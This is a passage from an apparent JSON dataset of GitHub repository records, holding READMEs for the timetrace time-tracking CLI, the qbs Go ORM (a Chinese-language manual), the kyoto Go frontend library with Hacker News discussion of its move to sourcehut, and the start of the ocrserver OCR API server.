set](#prefer-12-hour-clock-for-storing-records). |\n\n**Flags:**\n\n| Flag | Short | Description |\n| ---------- | ----- | ----------------------------------------------------------------------------- |\n| `--plus` | `-p` | Add the given duration to the record's end time, e.g. `--plus 1h 10m` |\n| `--minus` | `-m` | Subtract the given duration from the record's end time, e.g. `--minus 1h 10m` |\n| `--revert` | `-r` | Revert the record to its state prior to the last edit. |\n\n**Example:**\n\nEdit the latest record. Specifying no flag will open the record in your editor:\n\n```\ntimetrace edit record latest\n```\n\nAdd 15 minutes to the end of the record created on May 1st, 3PM:\n\n```\ntimetrace edit record 2021-05-01-15-00 --plus 15m\n```\n\n:fire: **New:** Restore the record to its state prior to the last edit:\n\n```\ntimetrace edit record 2021-05-01-15-00 --revert\n```\n\nTip: You can get the record key `2021-05-01-15-00` using [`timetrace list records`](#list-all-records-from-a-date).\n\n### Delete a project\n\n**Syntax:**\n\n```\ntimetrace delete project \n```\n\n**Arguments:**\n\n| Argument | Description |\n| -------- | ---------------- |\n| `KEY` | The project key. |\n\n**Flags:**\n\n| Flag | Short | Description |\n| ------------------- | ----- | --------------------------------------------------------------------------------------------------------------------------------------- |\n| `--revert` | `-r` | Restore a deleted project. |\n| `--exclude-records` | `-e` | Exclude associated project records from the deletion. If used together with `--revert`, excludes restoring project records from backup. 
|\n\n**Example:**\n\nDelete a project called `make-coffee`. Note that submodules will be deleted along with the parent project:\n\n```\ntimetrace delete project make-coffee\n```\nThe command will prompt for confirmation of whether project records should be deleted too.\n\n:fire: **New:** Restore the project to its pre-deletion state. Submodules will be restored along with the parent project:\n\n```\ntimetrace delete project make-coffee --revert\n```\nThe command will prompt for confirmation of whether project records should be restored from backup too. This is a\npotentially dangerous operation since records edited in the meantime will be overwritten by the backup.\n\n### Delete a record\n\n**Syntax:**\n\n```\ntimetrace delete record \n```\n\n**Arguments:**\n\n| Argument | Description |\n| ------------------ | ------------------------------------- |\n| `YYYY-MM-DD-HH-MM` | The start time of the desired record. |\n\n| Flag | Short | Description |\n| ---------- | ----- | --------------------------- |\n| `--yes` | | Do not ask for confirmation |\n| `--revert` | `-r` | Restore a deleted record. |\n\n**Example:**\n\nDelete a record created on May 1st 2021, 3:00 PM:\n\n```\ntimetrace delete record 2021-05-01-15-00\n```\n\n:fire: **New:** Restore the record to its pre-deletion state:\n\n```\ntimetrace delete record 2021-05-01-15-00 --revert\n```\n\n### Generate a report `[beta]`\n\n**Syntax:**\n\n```\ntimetrace report\n```\n\n**Flags:**\n\n| Flag | Short | Description |\n| ----------------------- | ----- | ------------------------------------------------------------------------------------------------------------------------------------------------------------------ |\n| `--billable` | `-b` | Filter report for only billable records. |\n| `--non-billable` | | Filter report for non-billable records. |\n| `--start ` | `-s` | Filter report from a specific point in time (start is inclusive). |\n| `--end ` | `-e` | Filter report to a specific point in time (end is inclusive). |\n| `--project ` | `-p` | Filter report for only one project. |\n| `--output ` | `-o` | Write report as JSON to file. |\n| `--file path/to/report` | `-f` | Write report to a specific file
(if not given will use config `report-dir`
if config not present writes to `$HOME/.timetrace/reports/report-`). |\n\n### Print version information\n\n**Syntax:**\n\n```\ntimetrace version\n```\n\n**Example:**\n\nPrint your installed timetrace version:\n\n```\ntimetrace version\n```\n\n## Configuration\n\nYou may provide your own configuration in a file called `config.yaml` within\n`$HOME/.timetrace`.\n\n### Prefer 12-hour clock for storing records\n\nIf you prefer to use the 12-hour clock instead of the default 24-hour format,\nadd this to your `config.yaml` file:\n\n```yaml\n# config.yml\nuse12hours: true\n```\n\nThis will allow you to [view a record](#get-a-record) created at 3:00 PM as\nfollows:\n\n```\ntimetrace get record 2021-05-14-03-00PM\n```\n\n### Prefer decimal hours for status and reports\n\nIf your prefer to use decimal hours for durations, e.g. `1.5h` instead of `1h 30m`,\nadd this to your `config.yaml` file:\n\n```yaml\nuseDecimalHours: \"On\"\n```\n\nTo display durations in _both_ formats at the same time, use:\n\n```yaml\nuseDecimalHours: \"Both\"\n```\n\n**Examples with durations in different formats:**\n\n```\ndefault (useDecimalHours = \"Off\")\n+-------------------+----------------------+----------------+----------+\n| CURRENT PROJECT | WORKED SINCE START | WORKED TODAY | BREAKS |\n+-------------------+----------------------+----------------+----------+\n| make-coffee | 1h 8min | 3h 8min | 0h 11min |\n+-------------------+----------------------+----------------+----------+\n\nDecimal Hours (useDecimalHours = \"On\")\n+-------------------+----------------------+----------------+----------+\n| CURRENT PROJECT | WORKED SINCE START | WORKED TODAY | BREAKS |\n+-------------------+----------------------+----------------+----------+\n| make-coffee | 1.2h | 3.2h | 0.2h |\n+-------------------+----------------------+----------------+----------+\n\nBoth (useDecimalHours = \"Both\")\n+-------------------+----------------------+----------------+---------------+\n| CURRENT PROJECT | WORKED SINCE START | WORKED TODAY | BREAKS |\n+-------------------+----------------------+----------------+---------------+\n| make-coffee | 1h 8min 1.2h | 3h 8min 3.2h | 0h 11min 0.2h |\n+-------------------+----------------------+----------------+---------------+\n```\n\n### Set your preferred editor\n\nBy default, timetrace will open the editor specified in `$EDITOR` or fall back\nto `vi`. You may set your provide your preferred editor like so:\n\n```yaml\n# config.yml\neditor: nano\n```\n\n### Configure defaults for projects\n\nTo add a configuration for a specific project, use the `projects` key which accepts\na map with the project key as key and the project configuration as value.\n\nEach project configuration currently has the following schema:\n\n```yaml\nbillable: bool\n```\n\nFor example, always make records for the `make-coffee` project billable:\n\n```yaml\n# config.yml\nprojects:\n make-coffee:\n billable: true\n```\n\n## Credits\n\nThis project depends on the following packages:\n\n- [spf13/cobra](https://github.com/spf13/cobra)\n- [spf13/viper](https://github.com/spf13/viper)\n- [fatih/color](https://github.com/fatih/color)\n- [olekukonko/tablewriter](https://github.com/olekukonko/tablewriter)\n- [enescakir/emoji](https://github.com/enescakir/emoji)\n", "readme_type": "markdown", "hn_comments": "What a haking haking", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "coocood/qbs", "link": "https://github.com/coocood/qbs", "tags": [], "stars": 550, "description": "QBS stands for Query By Struct. 
A Go ORM.", "lang": "Go", "repo_lang": "", "readme": "Qbs\r\n=====\r\n\r\nQbs is an ORM for the Go language.\r\n\r\n## Features\r\n\r\n* Define the table schema with a struct and create the table automatically.\r\n* If the table already exists and the struct defines new fields, Qbs automatically adds the corresponding columns to the table.\r\n* When querying, the fields of the struct are mapped into the \"SELECT\" statement.\r\n* Association queries are expressed by adding a struct pointer field that refers to the parent table.\r\n* Create, read, update and delete all go through structs.\r\n* After a query, the data you need is read back from the struct.\r\n* Query conditions are written with Condition, which makes it easy to combine multiple AND/OR sub-conditions with different priorities.\r\n* If the struct contains an Id field with a value greater than zero, that value is treated as a query condition and added to the WHERE clause.\r\n* created and updated fields can be defined by field name or by tag; on insert/update they are automatically set to the current time.\r\n* A struct can implement the Validator interface to validate the data before it is inserted or updated.\r\n* Currently supports MySQL, PostgreSQL and SQLite3; Oracle support is coming soon.\r\n* Supports connection pooling.\r\n
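\r\nAs a small illustration of the schema-definition features above, a model could look like the sketch below. This is only a sketch: the `qbs:\"size:...,index\"` tag and the `Id int64` primary-key convention are documented in the manual that follows, while the assumption that fields named `Created`/`Updated` of type `time.Time` are picked up as the auto-maintained timestamp columns is based on the feature list above.\r\n\r\n    package model\r\n\r\n    import \"time\"\r\n\r\n    type Post struct {\r\n        Id      int64     // primary key by convention\r\n        Title   string    `qbs:\"size:128,index\"`\r\n        Created time.Time // assumed to be set automatically on insert\r\n        Updated time.Time // assumed to be refreshed automatically on update\r\n    }\r\n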
\u5982\u679c\u5b57\u6bb5\u5b57\u4e3a`Id`\u800c\u4e14\u7c7b\u578b\u4e3a`int64`\u7684\u8bdd\uff0c\u4f1a\u88abQbs\u89c6\u4e3a\u4e3b\u952e\u3002\u5982\u679c\u60f3\u7528`Id`\u4ee5\u5916\u7684\u540d\u5b57\u505a\u4e3a\u4e3b\u952e\u540d\uff0c\u53ef\u4ee5\u5728\u540e\u52a0\u4e0a`qbs:\"pk\"`\u6765\u5b9a\u4e49\u4e3b\u952e\u3002\r\n- `Name`\u540e\u9762\u7684\u6807\u7b7e`qbs:\"size:32,index\"`\u7528\u6765\u5b9a\u4e49\u5efa\u8868\u65f6\u7684\u5b57\u6bb5\u5c5e\u6027\u3002\u5c5e\u6027\u5728\u53cc\u5f15\u53f7\u4e2d\u5b9a\u4e49\uff0c\u591a\u4e2a\u4e0d\u540c\u7684\u5c5e\u6027\u7528\u9017\u53f7\u533a\u5206\uff0c\u4e2d\u95f4\u6ca1\u6709\u7a7a\u683c\u3002\r\n- \u8fd9\u91cc\u7528\u5230\u4e24\u4e2a\u5c5e\u6027\uff0c\u4e00\u4e2a\u662f`size`\uff0c\u503c\u662f32\uff0c\u5bf9\u5e94\u7684SQL\u8bed\u53e5\u662f`varchar(32)`\u3002\r\n- \u53e6\u4e00\u4e2a\u5c5e\u6027\u662f`index`\uff0c\u5efa\u7acb\u8fd9\u4e2a\u5b57\u6bb5\u7684\u7d22\u5f15\u3002\u4e5f\u53ef\u4ee5\u7528`unique`\u6765\u5b9a\u4e49\u552f\u4e00\u7ea6\u675f\u7d22\u5f15\u3002\r\n- string\u7c7b\u578b\u7684size\u5c5e\u6027\u5f88\u91cd\u8981\uff0c\u5982\u679c\u52a0\u4e0asize\uff0c\u800c\u4e14size\u5728\u6570\u636e\u5e93\u652f\u6301\u7684\u8303\u56f4\u5185\uff0c\u4f1a\u751f\u6210\u5b9a\u957f\u7684varchar\u7c7b\u578b\uff0c\u4e0d\u52a0size\u7684\u8bdd\uff0c\u5bf9\u5e94\u7684\u6570\u636e\u5e93\u7c7b\u578b\u662f\u4e0d\u5b9a\u957f\u7684\uff0c\u6709\u7684\u6570\u636e\u5e93\uff08MySQL)\u65e0\u6cd5\u5efa\u7acb\u7d22\u5f15\u3002\r\n\r\n\r\n type User struct {\r\n Id int64\r\n Name string `qbs:\"size:32,index\"`\r\n }\r\n\r\n- \u5982\u679c\u9700\u8981\u8054\u5408\u7d22\u5f15\uff0c\u9700\u8981\u5b9e\u73b0Indexes\u65b9\u6cd5\u3002\r\n\r\n\r\n func (*User) Indexes(indexes *qbs.Indexes){\r\n //indexes.Add(\"column_a\", \"column_b\") or indexes.AddUnique(\"column_a\", \"column_b\")\r\n }\r\n\r\n\r\n### \u65b0\u5efa\u8868\uff1a\r\n- `qbs.NewMysql`\u51fd\u6570\u521b\u5efa\u6570\u636e\u5e93\u7684Dialect(\u65b9\u8a00)\uff0c\u56e0\u4e3a\u4e0d\u540c\u6570\u636e\u5e93\u7684SQL\u8bed\u53e5\u548c\u6570\u636e\u7c7b\u578b\u6709\u5dee\u5f02\uff0c\u6240\u4ee5\u9700\u8981\u4e0d\u540c\u7684Dialect\u6765\u9002\u914d\u3002\u6bcf\u4e2aQbs\u652f\u6301\u7684\u6570\u636e\u5e93\u90fd\u6709\u76f8\u5e94\u7684Dialect\u51fd\u6570\u3002\r\n- `qbs.NewMigration`\u51fd\u6570\u7528\u6765\u521b\u5efaMigration\u5b9e\u4f8b\uff0c\u7528\u6765\u8fdb\u884c\u5efa\u8868\u64cd\u4f5c\u3002\u548c\u6570\u636e\u5e93\u7684CRUD\u64cd\u4f5c\u7684Qbs\u5b9e\u4f8b\u662f\u5206\u5f00\u7684\u3002\r\n- \u5efa\u8868\u65f6\uff0c\u5373\u4f7f\u8868\u5df2\u5b58\u5728\uff0c\u5982\u679c\u53d1\u73b0\u6709\u65b0\u589e\u7684\u5b57\u6bb5\u6216\u7d22\u5f15\uff0c\u4f1a\u81ea\u52a8\u6267\u884c\u6dfb\u52a0\u5b57\u6bb5\u548c\u7d22\u5f15\u7684\u64cd\u4f5c\u3002\r\n- \u5efa\u8868\u65b9\u6cd5\u5efa\u8bae\u5728\u7a0b\u5e8f\u542f\u52a8\u65f6\u8c03\u7528\uff0c\u800c\u4e14\u5b8c\u5168\u53ef\u4ee5\u7528\u5728\u4ea7\u54c1\u6570\u636e\u5e93\u4e0a\u3002\u56e0\u4e3a\u6240\u6709\u7684\u8fc1\u79fb\u64cd\u4f5c\u90fd\u662f\u589e\u91cf\u7684\uff0c\u975e\u7834\u574f\u6027\u7684\uff0c\u6240\u4ee5\u4e0d\u4f1a\u6709\u6570\u636e\u4e22\u5931\u7684\u98ce\u9669\u3002\r\n- `CreateTableIfNotExists`\u65b9\u6cd5\u7684\u53c2\u6570\u5fc5\u987b\u662fstruct\u6307\u9488\uff0c\u4e0d\u7136\u4f1apanic\u3002\r\n\r\n\r\n func CreateUserTable() error{\r\n migration, err := qbs.GetMigration()\r\n if err != nil {\r\n return err\r\n }\r\n defer migration.Close()\r\n return migration.CreateTableIfNotExists(new(User))\r\n }\r\n\r\n\r\n### 
### Get and use a `*qbs.Qbs` instance:\r\n- Suppose we need to get and use Qbs inside an http request handler.\r\n- After obtaining the Qbs instance, you should immediately `defer q.Close()` so the database connection is returned to the pool.\r\n- qbs uses a connection pool with a default size of 100; it can be changed by calling `qbs.ChangePoolSize()` when the application starts.\r\n\r\n func GetUser(w http.ResponseWriter, r *http.Request){\r\n \tq, err := qbs.GetQbs()\r\n \tif err != nil {\r\n \t\tfmt.Println(err)\r\n \t\tw.WriteHeader(500)\r\n \t\treturn\r\n \t}\r\n \tdefer q.Close()\r\n \tu, err := FindUserById(q, 6)\r\n \tdata, _ := json.Marshal(u)\r\n \tw.Write(data)\r\n }\r\n\r\n### Insert data:\r\n- If handling one request requires several database operations, it is best to pass the *Qbs parameter between functions, so the acquire/close pair only has to be executed once.\r\n- Use the `Save` method to insert data. If the primary key Id of `user` has not been assigned, `Save` executes an INSERT statement.\r\n- If the `Id` of `user` is a positive integer, `Save` first executes a SELECT COUNT; if the count is 0 it executes an INSERT, otherwise an UPDATE.\r\n- The argument to `Save` must be a struct pointer, otherwise it panics.\r\n\r\n\r\n func CreateUser(q *qbs.Qbs) (*User,error){\r\n user := new(User)\r\n user.Name = \"Green\"\r\n _, err := q.Save(user)\r\n return user,err\r\n }\r\n\r\n### Query data:\r\n- To query by the Id primary key, just assign the Id on the user.\r\n\r\n\r\n func FindUserById(q *qbs.Qbs, id int64) (*User, error) {\r\n user := new(User)\r\n user.Id = id\r\n err := q.Find(user)\r\n return user, err\r\n }\r\n\r\n\r\n- To query multiple rows, call `FindAll`. The argument must be a pointer to a slice whose elements are struct pointers.\r\n\r\n\r\n func FindUsers(q *qbs.Qbs) ([]*User, error) {\r\n \tvar users []*User\r\n \terr := q.Limit(10).Offset(10).FindAll(&users)\r\n \treturn users, err\r\n }\r\n\r\n\r\n- For other query conditions, call the `Where` method. `WhereEqual(\"name\", name)` here is just shorthand for `Where(\"name = ?\", name)`.\r\n- Only the last call to `Where`/`WhereEqual` takes effect; conditions from earlier calls are overwritten by later ones, so they are suitable for simple query conditions.\r\n- 
Note that the first argument here is the column name `\"name\"`, not the struct field name `\"Name\"`. Every `AbCd`-style field or type name in the code is converted to the `ab_cd` form when stored in the database.\r\nThis is done to follow Go naming conventions, to make JSON serialization convenient, and to avoid database migration errors caused by letter case.\r\n\r\n\r\n func FindUserByName(q *qbs.Qbs, n string) (*User, error) {\r\n user := new(User)\r\n err := q.WhereEqual(\"name\", n).Find(user)\r\n return user, err\r\n }\r\n\r\n\r\n- If you need complex query conditions, call the `Condition` method. Its parameter type is `*Condition`, created with the `NewCondition`, `NewEqualCondition` or `NewInCondition` functions.\r\n- The `*Condition` type supports methods such as `And` and `Or`, which can be chained.\r\n- The `Condition` method can likewise only be called once, and it cannot be used together with `Where`.\r\n\r\n\r\n func FindUserByCondition(q *qbs.Qbs) (*User, error) {\r\n user := new(User)\r\n condition1 := qbs.NewCondition(\"id > ?\", 100).Or(\"id < ?\", 50).OrEqual(\"id\", 75)\r\n condition2 := qbs.NewCondition(\"name != ?\", \"Red\").And(\"name != ?\", \"Black\")\r\n condition1.AndCondition(condition2)\r\n err := q.Condition(condition1).Find(user)\r\n return user, err\r\n }\r\n\r\n\r\n### Update a single row:\r\n- To update one row, `Find` it first, then `Save` it.\r\n\r\n\r\n func UpdateOneUser(q *qbs.Qbs, id int64, name string) (affected int64, err error){\r\n \tuser, err := FindUserById(q, id)\r\n \tif err != nil {\r\n \t\treturn 0, err\r\n \t}\r\n \tuser.Name = name\r\n \treturn q.Save(user)\r\n }\r\n\r\n\r\n### Update multiple rows:\r\n- Multi-row updates are done with `Update`. Note that if you pass a struct containing all the fields, every field will be updated, which is usually not what you want.\r\nThe solution is to define a temporary struct inside the function that only contains the fields to be updated. If the function also needs the struct of the same name, put the conflicting part inside a block `{...}`.\r\n\r\n\r\n func UpdateMultipleUsers(q *qbs.Qbs)(affected int64, err error) {\r\n \ttype User struct {\r\n \t\tName string\r\n \t}\r\n \tuser := new(User)\r\n \tuser.Name = \"Blue\"\r\n \treturn q.WhereEqual(\"name\", \"Green\").Update(user)\r\n }\r\n\r\n### Delete:\r\n- The delete condition cannot be empty: define it either on the Id field, or with Where or Condition.\r\n\r\n\r\n func DeleteUser(q *qbs.Qbs, id int64)(affected int64, err error) {\r\n \tuser := new(User)\r\n \tuser.Id = id\r\n \treturn q.Delete(user)\r\n }\r\n\r\n
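- The original manual only shows deleting by Id; as noted above, the condition can also come from `Where` or `Condition`. A hedged sketch of deleting by a column value, assuming `Delete` honours a preceding `WhereEqual` the same way `Update` does (this helper is not in the original manual; check the GoDoc before relying on it):\r\n\r\n\r\n func DeleteUsersByName(q *qbs.Qbs, name string) (affected int64, err error) {\r\n \t// the WhereEqual condition replaces the Id-based condition used in DeleteUser above\r\n \treturn q.WhereEqual(\"name\", name).Delete(new(User))\r\n }\r\n\r\n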
### Define tables that need join queries:\r\n- Here `Post` contains a field named `AuthorId` of type `int64`, and at the same time a field named `Author` of type `*User`.\r\n- Using the pattern `{xxx}Id int64`, `{xxx} *{yyy}` is all it takes to define a join query.\r\n- Because the `Author` field is a pointer type, it is not added as a column when the `Post` table is created.\r\n- When the table is created, the join field is detected, so an index is automatically created on `author_id`. Join fields do not need an index defined in the tag.\r\n- The join field name does not have to follow the pattern above; as long as you explicitly add `qbs:\"join:Author\"` to the tag of `AuthorId`, the join query is defined just the same.\r\n- To define a foreign key constraint, explicitly add `qbs:\"fk:Author\"` to the tag of `AuthorId`.\r\n- Defining a foreign key also defines the join query and likewise creates the index automatically; the only difference is that the foreign key constraint statement is added when the table is created.\r\n- A `Created time.Time` field is set to the current time on insert, and an `Updated time.Time` field is automatically updated to the current time on update.\r\n- If you want to use names other than \"Created\" and \"Updated\" for the automatically assigned time fields, add `qbs:\"created\"` or `qbs:\"updated\"` to the tag.\r\n\r\n\r\n type Post struct {\r\n Id int64\r\n AuthorId int64\r\n Author *User\r\n Content string\r\n Created time.Time\r\n Updated time.Time\r\n }\r\n\r\n\r\n### Ignore certain fields when querying:\r\n- Sometimes a query does not need certain fields, especially join fields (such as `Author`) or fields holding large data (such as `Content`); omitting them improves query efficiency.\r\n\r\n\r\n func FindPostsOmitContentAndCreated(q *qbs.Qbs) ([]*Post, error) {\r\n \tvar posts []*Post\r\n \terr := q.OmitFields(\"Content\",\"Created\").FindAll(&posts)\r\n \treturn posts, err\r\n }\r\n\r\n\r\n
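- Since `Post` defines a join, a plain query brings the author back as well; a small illustrative sketch of reading the joined `Author` after a `Find` (this helper is not part of the original manual and assumes the join populates `Author`, as described above):\r\n\r\n\r\n func PrintPostAuthor(q *qbs.Qbs, postId int64) error {\r\n \tpost := new(Post)\r\n \tpost.Id = postId\r\n \tif err := q.Find(post); err != nil {\r\n \t\treturn err\r\n \t}\r\n \t// the automatic JOIN fills in post.Author from the user table\r\n \tfmt.Println(post.Content, \"written by\", post.Author.Name)\r\n \treturn nil\r\n }\r\n\r\n\r\n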
### Ignore join fields when querying:\r\n- If the struct defines a join, every Find automatically JOINs and nothing needs to be specified. Sometimes, however, a particular query does not need the join, and skipping it improves query efficiency. We could achieve the same effect with `OmitFields`, but that requires writing the field names by hand, which is less concise.\r\n- `OmitJoin` ignores all joins and returns data from the single table only; it can be used together with `OmitFields`.\r\n\r\n\r\n func FindPostsOmitJoin(q *qbs.Qbs) ([]*Post, error) {\r\n \tvar posts []*Post\r\n \terr := q.OmitJoin().OmitFields(\"Content\").FindAll(&posts)\r\n \treturn posts, err\r\n }\r\n\r\n... to be continued\r\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "kyoto-framework/kyoto", "link": "https://github.com/kyoto-framework/kyoto", "tags": ["frontend", "components", "framework", "go", "ui", "ui-components", "view", "golang"], "stars": 549, "description": "Golang SSR-first Frontend Library", "lang": "Go", "repo_lang": "", "readme": "
kyoto\n\nGo library for creating fast, SSR-first frontend avoiding vanilla templating downsides.\n\nDocumentation • Quick start • Who uses? • Support us
\n\n## Motivation\n\nCreating asynchronous and dynamic layout parts is a complex problem for larger projects using `html/template`.\nThis library tries to simplify that process.\n\n## What does kyoto propose?\n\n- Organize code into a configurable and standalone component structure\n- Get rid of spaghetti code inside handlers\n- Simple asynchronous lifecycle\n- Built-in dynamics like Hotwire or Laravel Livewire\n- Using the familiar built-in `html/template`\n- Full control over project setup (minimal dependencies)\n- 0kb JS payload without the actions client (~12kb when including the client)\n- Minimalistic utility-first package to simplify work with Go\n- Internationalization helper\n- Cache control helper package (with a CDN page caching setup guide)\n\n## Reasons to opt out\n\n- API may change drastically between major versions\n- You want to develop an SPA/PWA\n- You're just feeling OK with JS frameworks\n- Not suitable for a frontend with a lot of client-side logic\n\n## Quick start\n\nIf you want to start straight from an example, use the starter project. \n\n```bash\n$ git clone https://github.com/kyoto-framework/start \n```\n\nIf you want to start from scratch, we have a minimal working [example](https://pkg.go.dev/github.com/kyoto-framework/kyoto/v2#hdr-Quick_start) to start with.\n\n\n## Team\n\n- Yurii Zinets: [email](mailto:yurii.zinets@icloud.com), [telegram](https://t.me/yuriizinets)\n- Viktor Korniichuk: [email](mailto:rowdyhcs@gmail.com), [telegram](https://t.me/dinoarmless)\n\n## Who uses?\n\n### Broker One\n\n**Website**: [https://mybrokerone.com](https://mybrokerone.com)\n\nThe first version of the site was developed with Vue and suffered from a large payload and low performance.\nAfter discussion, it was decided to migrate to Go with the built-in `html/template`, due to the existing library infrastructure inside the project. \nDespite the good performance result, the code was badly structured and it was very uncomfortable to work within the existing paradigm. \nOn the basis of these problems, kyoto was born. Now, this library lies at the core of the platform.\n\n### Using the library in your project?\n\nPlease tell us your story! We would love to talk about your usage experience.\n\n## Support us\n\nAny project support is appreciated! Providing feedback, pull requests, new ideas, whatever. Also, donations and sponsoring will help us keep up a high update frequency. 
Just send us a quick email or a message on contacts provided above.\n\nIf you have an option to donate us with a crypto, we have some addresses.\n\nBitcoin: `bc1qgxe4u799f8pdyzk65sqpq28xj0yc6g05ckhvkk` \nEthereum: `0xEB2f24e830223bE081264e0c81fb5FD4DDD2B7B0`\n\nAlso, we have a page on open collective for backers support.\n\nOpen Collective: [https://opencollective.com/kyoto-framework](https://opencollective.com/kyoto-framework)", "readme_type": "markdown", "hn_comments": "last night I checked my billing page on sr.ht and there was a line chart that had \"11.2%\" to indicate that currently 11.2% of users are paying...there was also a redline at 13% which I assume is some sustainability thresholdif you want viable alternatives to github, pay up!sr.ht is a nice service that allows some premium features like ssh'ing into ci instances to check failures...there is plenty worth paying for> As far as a go packaging system makes host changing painful enough, there is no chance to keep old versions on the new host.> If you're using version 0.x, please, make a fork, or create a local project copy.I feel like an official mirror on GitHub would be cleaner, as the old URLs could still work, but I suppose that doesn't match the vision.Recently I contributed to a new project which needed repository hosting, and I was excited to suggest Sourcehut. But when we learned of the email-only collaboration, it was too uncomfortable for this particular group (and I include myself). Most devs are used to pull requests, it seems awkward that Sourcehut doesn't support them.Questions for whoever was involved with this decision or might know:Why was Sourcehut chosen? Any specific appealing features?Any alternatives considered?I wish Sourcehut displayed code on the repo's primary page (as opposed to a separate \"tree\" tab) like most mainstream services such as GitHub or GitLab.Isn't this moving from proprietary repo provider to proprietary repo provider (albeit a smaller one)?In another of the get-off-GitHub discussions recently, I mentioned to another FOSS project leader that they should consider taking their projects off GitHub to a forge that respects FOSS licenses. Sourcehut was one of the suggestions in addition to GitLab.I'm glad to see that some projects are leading the way in this direction. To me, this move shows that the devs are competent and not afraid of migrations away from legacy forges if necessary; similar to how people moved from Sourceforge to GitHub 10 years ago.I'll keep Kyoto framework in mind if need an SSR frontend framework in the future! I suggest others do the same.----------------------------------------[1] https://news.ycombinator.com/item?id=31941568Just had this thought: are there any decentralized code hosting services?To me, I don't really see a difference between GitHub and sr.ht. Companies can start out with these \"friendly\" attitudes towards FOSS, but when they reel in many paying customers, they can pretty easily, and without consequence, change their policies to be more aggressive (geared towards profit) and greedy. It just seems inevitable to me.However, decentralized hosting and governance might make it so that there can't be a hostile takeover and incorrect (relative to license) usage of FOSS code. 
I'm thinking something akin to IPFS but more specialized towards e.g git repository hosting.Not sure how such hosting would be feasible in terms of breaking even between hosting costs, but a decentralized service hosting distributed VCS databases seems more along the lines of the philosophy of DVCS's in general. DVCS's in general do not have timeliness requirements (i.e your \"git push\" most of the time doesn't have to propagate worldwide immediately) and the other goodies that come with being on GitHub (e.g CI/CD) seem orthogonal to the actual code hosting itself, and I don't see why that can't be built separately without being part of the service.Recent and related:Give up GitHub: The time has come - https://news.ycombinator.com/item?id=31932250 - June 2022 (544 comments)Any good reason(s) why SourceHut and not Gitlab?SourceHut is missing a lot of features from GitHub, I'm not even sure if SourceHut has a file tree. It's interface is also much different than GitHub's.Meanwhile GitLab is almost an exact clone of GitHub. It has discussion boards, pull requests (\"merge requests\"), even CI which replaces GitHub actions.I figure SourceHut is more FOSS-friendly than GitLab. But GitLab still supports self-hosting, and AFAIK is open-source and FOSS-freindly itself. The KDE and GNOME project even have their own hosted GitLab versions. All-in-all I just think migrating from GitHub to GitLab seems much easier than migrating to SourceHut.I approve the move, congrats!this makes me want gitlab to focus more on the software development side instead ci cd devopsIt would be useful to know what this project is. Lots of projects are on other code hosting services. Is this is a particularly important project? Go has been my daily driver for almost a decade and this is the first I've heard of it.If there's a big migration away from Github then I really worry what I'll do about discovering interesting stuff. I spend an hour or so a week looking through my Github feed. Something genuinely valuable will be lost once that is no longer a rich seam of new repos.git-remote-gcrypt + rclone + s3.These things are like \"Why I left Google\" from 2010s.I left Codeplex many years ago. I could easily leave Github as well, in fact I'll do that over the weekend.This article was pretty eye-opening. https://sfconservancy.org/GiveUpGitHub/The title confused me at first, \"they are moving from sr.ht to GitHub?\", but then I realized I'm just used to reading migrations like that in a \"from $serviceB to $serviceA\" manner and \"to $serviceA from $serviceB\" made it all wrong in my brain. Funny how that works.Yikes. Mailing list development might work for Linus and the kernel team but the PR approach on GitHub is so much easier for developers to discover and use and even for senior or more seasoned devs I\u2019d rather do this in the open on a PR than in some mailing list. Ugh.Copilot shouldn't be paid service of it's based on someone else workFWIW, just as Amazon and SalesForce are already doing their version of CoPilot, there is nothing to prevent GitHub from training its models off open source that is hosted on sr.ht or GitLab or anywhere else. If it is open source then the source is going to be available to be used for the models.For what it's worth, none of the reasons listed for switching away from Github in that SFC article are persuasive to me, but that's my choice. Kyoto project is free to choose what's best for them.Does Kyoto license explicitly forbid the code from being cloned to GitHub? 
If not, seems like at best buying time until someone else does.As a rule of thumb, it is a good idea to support smaller and indie companies than mega corporations, IMHO - even if those mega corporations aren't doing anything that is ethically dubious. That is doubtful, as it is likely not possible to become that big without trampling on some toes or bending some rules.Why support Github when there is st.ht? Why support Starbucks when you can support a mom & pop coffee shop? Why buy books from Amazon when you can buy from a Indie book store? Granted, not everyone has the patience, time and money to vote with wallet, but we can try wherever possible. I hope more people ditch GithubSomething I've been unclear on for a while, and I'd be grateful if anyone can explain it.The project points to [0] as its rationale for leaving Github. One of that document's complaints about Github is that they do business with the US's ICE department. It's not the only group from which I've heard such thorough contempt for ICE.I understand why people might have problems with some aspects of ICE's activities, e.g. charges of inhumane treatment of people crossing the border without authorization. So it makes sense to me that they'd protest those particular behaviors.But protesting all of ICE makes no more sense to me than un-nuanced calls to entirely defund the police, or abolish the entire DoD. I.e., it seems obvious that totally eliminating any of those government functions would cause problems that almost nobody would find acceptable.Is there something I'm missing?[0] https://sfconservancy.org/GiveUpGitHub/Dupe: https://news.ycombinator.com/item?id=31961402", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "otiai10/ocrserver", "link": "https://github.com/otiai10/ocrserver", "tags": ["go", "ocr", "ocr-server", "docker", "heroku", "api", "api-server", "curl"], "stars": 548, "description": "A simple OCR API server, seriously easy to be deployed by Docker, on Heroku as well", "lang": "Go", "repo_lang": "", "readme": "# ocrserver\n\n[![Go CI](https://github.com/otiai10/ocrserver/workflows/Go%20CI/badge.svg)](https://github.com/otiai10/ocrserver/actions?query=workflow%3A%22Go+CI%22)\n[![codecov](https://codecov.io/gh/otiai10/ocrserver/branch/main/graph/badge.svg)](https://codecov.io/gh/otiai10/ocrserver)\n[![Go Report Card](https://goreportcard.com/badge/github.com/otiai10/ocrserver)](https://goreportcard.com/report/github.com/otiai10/ocrserver)\n\nSimple OCR server, as a small working sample for [gosseract](https://github.com/otiai10/gosseract).\n\nTry now here https://ocr-example.herokuapp.com/, and deploy your own now.\n\n[![](https://user-images.githubusercontent.com/931554/36279290-7134626a-124b-11e8-8e47-d93b7122ea0d.png)](https://ocr-example.herokuapp.com)\n\n# Deploy to Heroku\n\n```sh\n# Get the code\n% git clone git@github.com:otiai10/ocrserver.git\n% cd ocrserver\n# Make your app\n% heroku login\n% heroku create\n# Deploy the container\n% heroku container:login\n% heroku container:push web\n# Enjoy it!\n% heroku open\n```\n\ncf. [heroku cli](https://devcenter.heroku.com/articles/heroku-cli#download-and-install)\n\n\n# Quick Start\n\n## Ready-Made Docker Image\n\n```sh\n% docker run -p 